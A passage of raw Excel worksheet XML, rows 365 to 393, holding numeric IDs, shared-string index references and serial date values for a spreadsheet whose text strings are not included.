      <c r="H365" s="9">
        <v>1741690</v>
      </c>
      <c r="I365" s="9" t="s">
        <v>2807</v>
      </c>
      <c r="J365" s="10">
        <v>43171.465277777781</v>
      </c>
      <c r="K365" s="3" t="s">
        <v>577</v>
      </c>
      <c r="L365" s="4">
        <v>9</v>
      </c>
      <c r="M365" s="4">
        <v>6</v>
      </c>
      <c r="N365" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O365" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P365" s="3"/>
      <c r="Q365" s="3"/>
    </row>
    <row r="366" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A366" s="3">
        <v>178386</v>
      </c>
      <c r="B366" s="3" t="s">
        <v>578</v>
      </c>
      <c r="C366" s="9" t="s">
        <v>2808</v>
      </c>
      <c r="D366" s="9" t="s">
        <v>2809</v>
      </c>
      <c r="E366" s="9">
        <v>18846</v>
      </c>
      <c r="F366" s="9" t="s">
        <v>2810</v>
      </c>
      <c r="G366" s="10">
        <v>43167.651388888888</v>
      </c>
      <c r="H366" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I366" s="9" t="s">
        <v>2811</v>
      </c>
      <c r="J366" s="10">
        <v>43167.315972222219</v>
      </c>
      <c r="K366" s="3" t="s">
        <v>579</v>
      </c>
      <c r="L366" s="4">
        <v>7</v>
      </c>
      <c r="M366" s="4">
        <v>5</v>
      </c>
      <c r="N366" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O366" s="3"/>
      <c r="P366" s="3"/>
      <c r="Q366" s="3"/>
    </row>
    <row r="367" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A367" s="3">
        <v>178425</v>
      </c>
      <c r="B367" s="3" t="s">
        <v>612</v>
      </c>
      <c r="C367" s="9" t="s">
        <v>2812</v>
      </c>
      <c r="D367" s="9" t="s">
        <v>2813</v>
      </c>
      <c r="E367" s="9">
        <v>18846</v>
      </c>
      <c r="F367" s="9" t="s">
        <v>2810</v>
      </c>
      <c r="G367" s="10">
        <v>42397.899305555555</v>
      </c>
      <c r="H367" s="9">
        <v>2411320</v>
      </c>
      <c r="I367" s="9" t="s">
        <v>2814</v>
      </c>
      <c r="J367" s="10">
        <v>42363.046527777777</v>
      </c>
      <c r="K367" s="3" t="s">
        <v>613</v>
      </c>
      <c r="L367" s="4">
        <v>3</v>
      </c>
      <c r="M367" s="4">
        <v>1</v>
      </c>
      <c r="N367" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O367" s="3"/>
      <c r="P367" s="3"/>
      <c r="Q367" s="3"/>
    </row>
    <row r="368" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A368" s="9">
        <v>179123</v>
      </c>
      <c r="B368" s="9" t="s">
        <v>1168</v>
      </c>
      <c r="C368" s="9" t="s">
        <v>2815</v>
      </c>
      <c r="D368" s="9" t="s">
        <v>2816</v>
      </c>
      <c r="E368" s="9">
        <v>1136709</v>
      </c>
      <c r="F368" s="9" t="s">
        <v>2817</v>
      </c>
      <c r="G368" s="10">
        <v>41720.131944444445</v>
      </c>
      <c r="H368" s="9">
        <v>2030167</v>
      </c>
      <c r="I368" s="9" t="s">
        <v>2818</v>
      </c>
      <c r="J368" s="10">
        <v>41712.431250000001</v>
      </c>
      <c r="K368" s="9" t="s">
        <v>1169</v>
      </c>
      <c r="L368" s="7">
        <v>11</v>
      </c>
      <c r="M368" s="7">
        <v>9</v>
      </c>
      <c r="N368" s="9" t="s">
        <v>703</v>
      </c>
      <c r="O368" s="9" t="s">
        <v>704</v>
      </c>
      <c r="P368" s="9"/>
      <c r="Q368" s="9"/>
    </row>
    <row r="369" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A369" s="9">
        <v>179423</v>
      </c>
      <c r="B369" s="9" t="s">
        <v>1170</v>
      </c>
      <c r="C369" s="9" t="s">
        <v>2819</v>
      </c>
      <c r="D369" s="9" t="s">
        <v>2820</v>
      </c>
      <c r="E369" s="9">
        <v>13913</v>
      </c>
      <c r="F369" s="9" t="s">
        <v>2821</v>
      </c>
      <c r="G369" s="10">
        <v>39728.731944444444</v>
      </c>
      <c r="H369" s="9">
        <v>5640</v>
      </c>
      <c r="I369" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J369" s="10">
        <v>39728.715277777781</v>
      </c>
      <c r="K369" s="9" t="s">
        <v>1171</v>
      </c>
      <c r="L369" s="7">
        <v>8</v>
      </c>
      <c r="M369" s="7">
        <v>6</v>
      </c>
      <c r="N369" s="9" t="s">
        <v>697</v>
      </c>
      <c r="O369" s="9"/>
      <c r="P369" s="9"/>
      <c r="Q369" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="370" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A370" s="9">
        <v>179605</v>
      </c>
      <c r="B370" s="9" t="s">
        <v>1172</v>
      </c>
      <c r="C370" s="9" t="s">
        <v>2822</v>
      </c>
      <c r="D370" s="9" t="s">
        <v>2823</v>
      </c>
      <c r="E370" s="9">
        <v>305</v>
      </c>
      <c r="F370" s="9" t="s">
        <v>1860</v>
      </c>
      <c r="G370" s="10">
        <v>39728.745833333334</v>
      </c>
      <c r="H370" s="9">
        <v>305</v>
      </c>
      <c r="I370" s="9" t="s">
        <v>1860</v>
      </c>
      <c r="J370" s="10">
        <v>39728.745833333334</v>
      </c>
      <c r="K370" s="9" t="s">
        <v>1173</v>
      </c>
      <c r="L370" s="7">
        <v>3</v>
      </c>
      <c r="M370" s="7">
        <v>1</v>
      </c>
      <c r="N370" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O370" s="9"/>
      <c r="P370" s="9"/>
      <c r="Q370" s="9"/>
    </row>
    <row r="371" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A371" s="3">
        <v>181541</v>
      </c>
      <c r="B371" s="3" t="s">
        <v>630</v>
      </c>
      <c r="C371" s="9" t="s">
        <v>2824</v>
      </c>
      <c r="D371" s="9" t="s">
        <v>2825</v>
      </c>
      <c r="E371" s="9">
        <v>61305</v>
      </c>
      <c r="F371" s="9" t="s">
        <v>2826</v>
      </c>
      <c r="G371" s="10">
        <v>41529.586111111108</v>
      </c>
      <c r="H371" s="9">
        <v>2063547</v>
      </c>
      <c r="I371" s="9" t="s">
        <v>2827</v>
      </c>
      <c r="J371" s="10">
        <v>41529.568749999999</v>
      </c>
      <c r="K371" s="3" t="s">
        <v>631</v>
      </c>
      <c r="L371" s="4">
        <v>3</v>
      </c>
      <c r="M371" s="4">
        <v>1</v>
      </c>
      <c r="N371" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O371" s="3"/>
      <c r="P371" s="3"/>
      <c r="Q371" s="3"/>
    </row>
    <row r="372" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A372" s="9">
        <v>181693</v>
      </c>
      <c r="B372" s="9" t="s">
        <v>1174</v>
      </c>
      <c r="C372" s="9" t="s">
        <v>2828</v>
      </c>
      <c r="D372" s="9" t="s">
        <v>2829</v>
      </c>
      <c r="E372" s="9">
        <v>14065</v>
      </c>
      <c r="F372" s="9" t="s">
        <v>2554</v>
      </c>
      <c r="G372" s="10">
        <v>41515.474305555559</v>
      </c>
      <c r="H372" s="9">
        <v>128028</v>
      </c>
      <c r="I372" s="9" t="s">
        <v>2830</v>
      </c>
      <c r="J372" s="10">
        <v>41515.173611111109</v>
      </c>
      <c r="K372" s="9" t="s">
        <v>1175</v>
      </c>
      <c r="L372" s="7">
        <v>10</v>
      </c>
      <c r="M372" s="7">
        <v>8</v>
      </c>
      <c r="N372" s="9"/>
      <c r="O372" s="9"/>
      <c r="P372" s="9"/>
      <c r="Q372" s="9" t="s">
        <v>978</v>
      </c>
    </row>
    <row r="373" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A373" s="9">
        <v>181953</v>
      </c>
      <c r="B373" s="9" t="s">
        <v>1176</v>
      </c>
      <c r="C373" s="9" t="s">
        <v>2831</v>
      </c>
      <c r="D373" s="9" t="s">
        <v>2832</v>
      </c>
      <c r="E373" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F373" s="9" t="s">
        <v>2833</v>
      </c>
      <c r="G373" s="10">
        <v>39729.456944444442</v>
      </c>
      <c r="H373" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I373" s="9" t="s">
        <v>2833</v>
      </c>
      <c r="J373" s="10">
        <v>39729.452777777777</v>
      </c>
      <c r="K373" s="9" t="s">
        <v>1177</v>
      </c>
      <c r="L373" s="7">
        <v>3</v>
      </c>
      <c r="M373" s="7">
        <v>1</v>
      </c>
      <c r="N373" s="9" t="s">
        <v>696</v>
      </c>
      <c r="O373" s="9"/>
      <c r="P373" s="9"/>
      <c r="Q373" s="9"/>
    </row>
    <row r="374" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A374" s="3">
        <v>182817</v>
      </c>
      <c r="B374" s="3" t="s">
        <v>632</v>
      </c>
      <c r="C374" s="9" t="s">
        <v>2834</v>
      </c>
      <c r="D374" s="9" t="s">
        <v>2835</v>
      </c>
      <c r="E374" s="9">
        <v>67945</v>
      </c>
      <c r="F374" s="9" t="s">
        <v>2836</v>
      </c>
      <c r="G374" s="10">
        <v>41011.170138888891</v>
      </c>
      <c r="H374" s="9">
        <v>67945</v>
      </c>
      <c r="I374" s="9" t="s">
        <v>2836</v>
      </c>
      <c r="J374" s="10">
        <v>41011.169444444444</v>
      </c>
      <c r="K374" s="3" t="s">
        <v>633</v>
      </c>
      <c r="L374" s="4">
        <v>3</v>
      </c>
      <c r="M374" s="4">
        <v>1</v>
      </c>
      <c r="N374" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O374" s="3"/>
      <c r="P374" s="3"/>
      <c r="Q374" s="3"/>
    </row>
    <row r="375" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A375" s="3">
        <v>183804</v>
      </c>
      <c r="B375" s="3" t="s">
        <v>634</v>
      </c>
      <c r="C375" s="9" t="s">
        <v>2837</v>
      </c>
      <c r="D375" s="9" t="s">
        <v>2838</v>
      </c>
      <c r="E375" s="9">
        <v>14033</v>
      </c>
      <c r="F375" s="9" t="s">
        <v>2839</v>
      </c>
      <c r="G375" s="10">
        <v>40689.234027777777</v>
      </c>
      <c r="H375" s="9">
        <v>-1</v>
      </c>
      <c r="I375" s="9" t="s">
        <v>2025</v>
      </c>
      <c r="J375" s="10">
        <v>40669.563888888886</v>
      </c>
      <c r="K375" s="3" t="s">
        <v>635</v>
      </c>
      <c r="L375" s="4">
        <v>4</v>
      </c>
      <c r="M375" s="4">
        <v>2</v>
      </c>
      <c r="N375" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O375" s="3" t="s">
        <v>706</v>
      </c>
      <c r="P375" s="3"/>
      <c r="Q375" s="3"/>
    </row>
    <row r="376" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A376" s="3">
        <v>184020</v>
      </c>
      <c r="B376" s="3" t="s">
        <v>678</v>
      </c>
      <c r="C376" s="9" t="s">
        <v>2840</v>
      </c>
      <c r="D376" s="9" t="s">
        <v>2841</v>
      </c>
      <c r="E376" s="9">
        <v>4857</v>
      </c>
      <c r="F376" s="9" t="s">
        <v>2842</v>
      </c>
      <c r="G376" s="10">
        <v>39900.138194444444</v>
      </c>
      <c r="H376" s="9">
        <v>4857</v>
      </c>
      <c r="I376" s="9" t="s">
        <v>2842</v>
      </c>
      <c r="J376" s="10">
        <v>39885.53125</v>
      </c>
      <c r="K376" s="3" t="s">
        <v>679</v>
      </c>
      <c r="L376" s="4">
        <v>3</v>
      </c>
      <c r="M376" s="4">
        <v>1</v>
      </c>
      <c r="N376" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O376" s="3"/>
      <c r="P376" s="3"/>
      <c r="Q376" s="3"/>
    </row>
    <row r="377" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A377" s="3">
        <v>184701</v>
      </c>
      <c r="B377" s="3" t="s">
        <v>680</v>
      </c>
      <c r="C377" s="9" t="s">
        <v>2843</v>
      </c>
      <c r="D377" s="9" t="s">
        <v>2844</v>
      </c>
      <c r="E377" s="9">
        <v>21461</v>
      </c>
      <c r="F377" s="9" t="s">
        <v>2845</v>
      </c>
      <c r="G377" s="10">
        <v>40623.943055555559</v>
      </c>
      <c r="H377" s="9">
        <v>97010</v>
      </c>
      <c r="I377" s="9" t="s">
        <v>2846</v>
      </c>
      <c r="J377" s="10">
        <v>40618.754861111112</v>
      </c>
      <c r="K377" s="3" t="s">
        <v>681</v>
      </c>
      <c r="L377" s="4">
        <v>3</v>
      </c>
      <c r="M377" s="4">
        <v>1</v>
      </c>
      <c r="N377" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O377" s="3"/>
      <c r="P377" s="3"/>
      <c r="Q377" s="3"/>
    </row>
    <row r="378" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A378" s="3">
        <v>185331</v>
      </c>
      <c r="B378" s="3" t="s">
        <v>682</v>
      </c>
      <c r="C378" s="9" t="s">
        <v>2847</v>
      </c>
      <c r="D378" s="9" t="s">
        <v>2848</v>
      </c>
      <c r="E378" s="9">
        <v>3528</v>
      </c>
      <c r="F378" s="9" t="s">
        <v>2849</v>
      </c>
      <c r="G378" s="10">
        <v>41905.56527777778</v>
      </c>
      <c r="H378" s="9">
        <v>1378574</v>
      </c>
      <c r="I378" s="9" t="s">
        <v>2850</v>
      </c>
      <c r="J378" s="10">
        <v>41187.382638888892</v>
      </c>
      <c r="K378" s="3" t="s">
        <v>683</v>
      </c>
      <c r="L378" s="4">
        <v>3</v>
      </c>
      <c r="M378" s="4">
        <v>1</v>
      </c>
      <c r="N378" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O378" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P378" s="3"/>
      <c r="Q378" s="3"/>
    </row>
    <row r="379" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A379" s="3">
        <v>185544</v>
      </c>
      <c r="B379" s="3" t="s">
        <v>684</v>
      </c>
      <c r="C379" s="9" t="s">
        <v>2851</v>
      </c>
      <c r="D379" s="9" t="s">
        <v>2852</v>
      </c>
      <c r="E379" s="9">
        <v>233</v>
      </c>
      <c r="F379" s="9" t="s">
        <v>2853</v>
      </c>
      <c r="G379" s="10">
        <v>43157.854166666664</v>
      </c>
      <c r="H379" s="9">
        <v>4077294</v>
      </c>
      <c r="I379" s="9" t="s">
        <v>2854</v>
      </c>
      <c r="J379" s="10">
        <v>43155.209722222222</v>
      </c>
      <c r="K379" s="3" t="s">
        <v>685</v>
      </c>
      <c r="L379" s="4">
        <v>3</v>
      </c>
      <c r="M379" s="4">
        <v>1</v>
      </c>
      <c r="N379" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O379" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P379" s="3"/>
      <c r="Q379" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="380" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A380" s="3">
        <v>185900</v>
      </c>
      <c r="B380" s="3" t="s">
        <v>686</v>
      </c>
      <c r="C380" s="9" t="s">
        <v>2855</v>
      </c>
      <c r="D380" s="9" t="s">
        <v>2856</v>
      </c>
      <c r="E380" s="9">
        <v>14122</v>
      </c>
      <c r="F380" s="9" t="s">
        <v>2857</v>
      </c>
      <c r="G380" s="10">
        <v>40703.14166666667</v>
      </c>
      <c r="H380" s="9">
        <v>26334</v>
      </c>
      <c r="I380" s="9" t="s">
        <v>2858</v>
      </c>
      <c r="J380" s="10">
        <v>40659.543055555558</v>
      </c>
      <c r="K380" s="3" t="s">
        <v>687</v>
      </c>
      <c r="L380" s="4">
        <v>4</v>
      </c>
      <c r="M380" s="4">
        <v>2</v>
      </c>
      <c r="N380" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O380" s="3"/>
      <c r="P380" s="3"/>
      <c r="Q380" s="3"/>
    </row>
    <row r="381" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A381" s="3">
        <v>198459</v>
      </c>
      <c r="B381" s="3" t="s">
        <v>13</v>
      </c>
      <c r="C381" s="9" t="s">
        <v>2859</v>
      </c>
      <c r="D381" s="9" t="s">
        <v>2860</v>
      </c>
      <c r="E381" s="9">
        <v>24874</v>
      </c>
      <c r="F381" s="9" t="s">
        <v>2861</v>
      </c>
      <c r="G381" s="10">
        <v>39734.780555555553</v>
      </c>
      <c r="H381" s="9">
        <v>24874</v>
      </c>
      <c r="I381" s="9" t="s">
        <v>2861</v>
      </c>
      <c r="J381" s="10">
        <v>39734.779861111114</v>
      </c>
      <c r="K381" s="3" t="s">
        <v>14</v>
      </c>
      <c r="L381" s="4">
        <v>5</v>
      </c>
      <c r="M381" s="4">
        <v>3</v>
      </c>
      <c r="N381" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O381" s="3"/>
      <c r="P381" s="3"/>
      <c r="Q381" s="3"/>
    </row>
    <row r="382" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A382" s="3">
        <v>198550</v>
      </c>
      <c r="B382" s="3" t="s">
        <v>15</v>
      </c>
      <c r="C382" s="9" t="s">
        <v>2862</v>
      </c>
      <c r="D382" s="9" t="s">
        <v>2863</v>
      </c>
      <c r="E382" s="9">
        <v>8091</v>
      </c>
      <c r="F382" s="9" t="s">
        <v>2864</v>
      </c>
      <c r="G382" s="10">
        <v>39735.061805555553</v>
      </c>
      <c r="H382" s="9">
        <v>8091</v>
      </c>
      <c r="I382" s="9" t="s">
        <v>2864</v>
      </c>
      <c r="J382" s="10">
        <v>39735.049305555556</v>
      </c>
      <c r="K382" s="3" t="s">
        <v>16</v>
      </c>
      <c r="L382" s="4">
        <v>4</v>
      </c>
      <c r="M382" s="4">
        <v>3</v>
      </c>
      <c r="N382" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O382" s="3"/>
      <c r="P382" s="3"/>
      <c r="Q382" s="3"/>
    </row>
    <row r="383" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A383" s="3">
        <v>199038</v>
      </c>
      <c r="B383" s="3" t="s">
        <v>17</v>
      </c>
      <c r="C383" s="9" t="s">
        <v>2865</v>
      </c>
      <c r="D383" s="9" t="s">
        <v>2866</v>
      </c>
      <c r="E383" s="9">
        <v>246246</v>
      </c>
      <c r="F383" s="9" t="s">
        <v>1638</v>
      </c>
      <c r="G383" s="10">
        <v>42845.677777777775</v>
      </c>
      <c r="H383" s="9">
        <v>754215</v>
      </c>
      <c r="I383" s="9" t="s">
        <v>1639</v>
      </c>
      <c r="J383" s="10">
        <v>42842.111111111109</v>
      </c>
      <c r="K383" s="3" t="s">
        <v>18</v>
      </c>
      <c r="L383" s="4">
        <v>4</v>
      </c>
      <c r="M383" s="4">
        <v>2</v>
      </c>
      <c r="N383" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O383" s="3"/>
      <c r="P383" s="3"/>
      <c r="Q383" s="3"/>
    </row>
    <row r="384" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A384" s="3">
        <v>199133</v>
      </c>
      <c r="B384" s="3" t="s">
        <v>37</v>
      </c>
      <c r="C384" s="9" t="s">
        <v>2867</v>
      </c>
      <c r="D384" s="9" t="s">
        <v>2868</v>
      </c>
      <c r="E384" s="9">
        <v>27615</v>
      </c>
      <c r="F384" s="9" t="s">
        <v>2869</v>
      </c>
      <c r="G384" s="10">
        <v>39922.821527777778</v>
      </c>
      <c r="H384" s="9">
        <v>27615</v>
      </c>
      <c r="I384" s="9" t="s">
        <v>2869</v>
      </c>
      <c r="J384" s="10">
        <v>39922.697916666664</v>
      </c>
      <c r="K384" s="3" t="s">
        <v>38</v>
      </c>
      <c r="L384" s="4">
        <v>5</v>
      </c>
      <c r="M384" s="4">
        <v>3</v>
      </c>
      <c r="N384" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O384" s="3"/>
      <c r="P384" s="3"/>
      <c r="Q384" s="3"/>
    </row>
    <row r="385" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A385" s="9">
        <v>199418</v>
      </c>
      <c r="B385" s="9" t="s">
        <v>1178</v>
      </c>
      <c r="C385" s="9" t="s">
        <v>2870</v>
      </c>
      <c r="D385" s="9" t="s">
        <v>2871</v>
      </c>
      <c r="E385" s="9">
        <v>3467</v>
      </c>
      <c r="F385" s="9" t="s">
        <v>2872</v>
      </c>
      <c r="G385" s="10">
        <v>42485.748611111114</v>
      </c>
      <c r="H385" s="9">
        <v>3747990</v>
      </c>
      <c r="I385" s="9" t="s">
        <v>2873</v>
      </c>
      <c r="J385" s="10">
        <v>42481.734722222223</v>
      </c>
      <c r="K385" s="9" t="s">
        <v>1179</v>
      </c>
      <c r="L385" s="7">
        <v>9</v>
      </c>
      <c r="M385" s="7">
        <v>7</v>
      </c>
      <c r="N385" s="9"/>
      <c r="O385" s="9" t="s">
        <v>702</v>
      </c>
      <c r="P385" s="9" t="s">
        <v>699</v>
      </c>
      <c r="Q385" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="386" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A386" s="3">
        <v>199882</v>
      </c>
      <c r="B386" s="3" t="s">
        <v>39</v>
      </c>
      <c r="C386" s="9" t="s">
        <v>2874</v>
      </c>
      <c r="D386" s="9" t="s">
        <v>2875</v>
      </c>
      <c r="E386" s="9">
        <v>19468</v>
      </c>
      <c r="F386" s="9" t="s">
        <v>2876</v>
      </c>
      <c r="G386" s="10">
        <v>39735.13958333333</v>
      </c>
      <c r="H386" s="9">
        <v>19468</v>
      </c>
      <c r="I386" s="9" t="s">
        <v>2876</v>
      </c>
      <c r="J386" s="10">
        <v>39735.135416666664</v>
      </c>
      <c r="K386" s="3" t="s">
        <v>40</v>
      </c>
      <c r="L386" s="4">
        <v>4</v>
      </c>
      <c r="M386" s="4">
        <v>3</v>
      </c>
      <c r="N386" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O386" s="3"/>
      <c r="P386" s="3"/>
      <c r="Q386" s="3"/>
    </row>
    <row r="387" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A387" s="9">
        <v>199918</v>
      </c>
      <c r="B387" s="9" t="s">
        <v>1180</v>
      </c>
      <c r="C387" s="9" t="s">
        <v>2877</v>
      </c>
      <c r="D387" s="9" t="s">
        <v>2878</v>
      </c>
      <c r="E387" s="9">
        <v>6335</v>
      </c>
      <c r="F387" s="9" t="s">
        <v>2879</v>
      </c>
      <c r="G387" s="10">
        <v>39735.920138888891</v>
      </c>
      <c r="H387" s="9">
        <v>6918</v>
      </c>
      <c r="I387" s="9" t="s">
        <v>2880</v>
      </c>
      <c r="J387" s="10">
        <v>39735.321527777778</v>
      </c>
      <c r="K387" s="9" t="s">
        <v>1181</v>
      </c>
      <c r="L387" s="7">
        <v>4</v>
      </c>
      <c r="M387" s="7">
        <v>3</v>
      </c>
      <c r="N387" s="9"/>
      <c r="O387" s="9"/>
      <c r="P387" s="9"/>
      <c r="Q387" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="388" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A388" s="3">
        <v>200103</v>
      </c>
      <c r="B388" s="3" t="s">
        <v>79</v>
      </c>
      <c r="C388" s="9" t="s">
        <v>2881</v>
      </c>
      <c r="D388" s="9" t="s">
        <v>2882</v>
      </c>
      <c r="E388" s="9">
        <v>3560</v>
      </c>
      <c r="F388" s="9" t="s">
        <v>2046</v>
      </c>
      <c r="G388" s="10">
        <v>39735.276388888888</v>
      </c>
      <c r="H388" s="9">
        <v>14065</v>
      </c>
      <c r="I388" s="9" t="s">
        <v>2554</v>
      </c>
      <c r="J388" s="10">
        <v>39735.274305555555</v>
      </c>
      <c r="K388" s="3" t="s">
        <v>80</v>
      </c>
      <c r="L388" s="4">
        <v>3</v>
      </c>
      <c r="M388" s="4">
        <v>1</v>
      </c>
      <c r="N388" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O388" s="3"/>
      <c r="P388" s="3"/>
      <c r="Q388" s="3"/>
    </row>
    <row r="389" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A389" s="3">
        <v>200277</v>
      </c>
      <c r="B389" s="3" t="s">
        <v>81</v>
      </c>
      <c r="C389" s="9" t="s">
        <v>2883</v>
      </c>
      <c r="D389" s="9" t="s">
        <v>2884</v>
      </c>
      <c r="E389" s="9">
        <v>6918</v>
      </c>
      <c r="F389" s="9" t="s">
        <v>2880</v>
      </c>
      <c r="G389" s="10">
        <v>40549.324999999997</v>
      </c>
      <c r="H389" s="9">
        <v>132528</v>
      </c>
      <c r="I389" s="9" t="s">
        <v>2885</v>
      </c>
      <c r="J389" s="10">
        <v>40520.761805555558</v>
      </c>
      <c r="K389" s="3" t="s">
        <v>82</v>
      </c>
      <c r="L389" s="4">
        <v>4</v>
      </c>
      <c r="M389" s="4">
        <v>2</v>
      </c>
      <c r="N389" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O389" s="3"/>
      <c r="P389" s="3"/>
      <c r="Q389" s="3"/>
    </row>
    <row r="390" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A390" s="9">
        <v>200439</v>
      </c>
      <c r="B390" s="9" t="s">
        <v>1182</v>
      </c>
      <c r="C390" s="9" t="s">
        <v>2886</v>
      </c>
      <c r="D390" s="9" t="s">
        <v>2887</v>
      </c>
      <c r="E390" s="9">
        <v>26004</v>
      </c>
      <c r="F390" s="9" t="s">
        <v>2888</v>
      </c>
      <c r="G390" s="10">
        <v>39879.988194444442</v>
      </c>
      <c r="H390" s="9">
        <v>5640</v>
      </c>
      <c r="I390" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J390" s="10">
        <v>39875.902083333334</v>
      </c>
      <c r="K390" s="9" t="s">
        <v>1183</v>
      </c>
      <c r="L390" s="7">
        <v>3</v>
      </c>
      <c r="M390" s="7">
        <v>1</v>
      </c>
      <c r="N390" s="9" t="s">
        <v>703</v>
      </c>
      <c r="O390" s="9"/>
      <c r="P390" s="9"/>
      <c r="Q390" s="9"/>
    </row>
    <row r="391" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A391" s="3">
        <v>200981</v>
      </c>
      <c r="B391" s="3" t="s">
        <v>83</v>
      </c>
      <c r="C391" s="9" t="s">
        <v>2889</v>
      </c>
      <c r="D391" s="9" t="s">
        <v>2890</v>
      </c>
      <c r="E391" s="9">
        <v>237838</v>
      </c>
      <c r="F391" s="9" t="s">
        <v>1655</v>
      </c>
      <c r="G391" s="10">
        <v>41312.730555555558</v>
      </c>
      <c r="H391" s="9">
        <v>395659</v>
      </c>
      <c r="I391" s="9" t="s">
        <v>1656</v>
      </c>
      <c r="J391" s="10">
        <v>41312.581944444442</v>
      </c>
      <c r="K391" s="3" t="s">
        <v>84</v>
      </c>
      <c r="L391" s="4">
        <v>3</v>
      </c>
      <c r="M391" s="4">
        <v>1</v>
      </c>
      <c r="N391" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O391" s="3"/>
      <c r="P391" s="3"/>
      <c r="Q391" s="3"/>
    </row>
    <row r="392" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A392" s="9">
        <v>201183</v>
      </c>
      <c r="B392" s="9" t="s">
        <v>1184</v>
      </c>
      <c r="C392" s="9" t="s">
        <v>2891</v>
      </c>
      <c r="D392" s="9" t="s">
        <v>2892</v>
      </c>
      <c r="E392" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F392" s="9" t="s">
        <v>2893</v>
      </c>
      <c r="G392" s="10">
        <v>39735.615972222222</v>
      </c>
      <c r="H392" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I392" s="9" t="s">
        <v>2893</v>
      </c>
      <c r="J392" s="10">
        <v>39735.593055555553</v>
      </c>
      <c r="K392" s="9" t="s">
        <v>1185</v>
      </c>
      <c r="L392" s="7">
        <v>4</v>
      </c>
      <c r="M392" s="7">
        <v>1</v>
      </c>
      <c r="N392" s="9"/>
      <c r="O392" s="9"/>
      <c r="P392" s="9"/>
      <c r="Q392" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="393" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A393" s="3">
        <v>201378</v>
      </c>
      <c r="B393" s="3" t="s">
        <v>85</v>
      </c>
      <c r="C393" s="9" t="s">
        <v>2894</v>
      </c>
      <c r="D393" s="9" t="s">
        <v>2895</v>
      </c>
      <c r="E393" s="9">
        <v>1982631</v>
      </c>
      <c r="F393" s="9" t="s">
        <v>2896</v>
      </c>
      <c r="G393" s="10">
        <v>41330.390277777777</v>
      </c>
      <c r="H393" s="9">
        <v>917198</v>
      </c>
      <c r="I393" s="9" t="s">
        <v>2897</v>
      </c>
      <c r="J393" s="10">
        <v>41075.648611111108</v>
      </c>
      <c r="K393" s="3" t="s">
        <v>86</v>
      </c>
      <c r="L393" s="4">
        <v>10</v>
      </c>
      <c r="M393" s="4">
        <v>8</v>
      </c>
      <c r="N393" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O393" s="3"/>
      <c r="P393" s="3"/>
      <c r="Q393" s="3"/>
    </row>
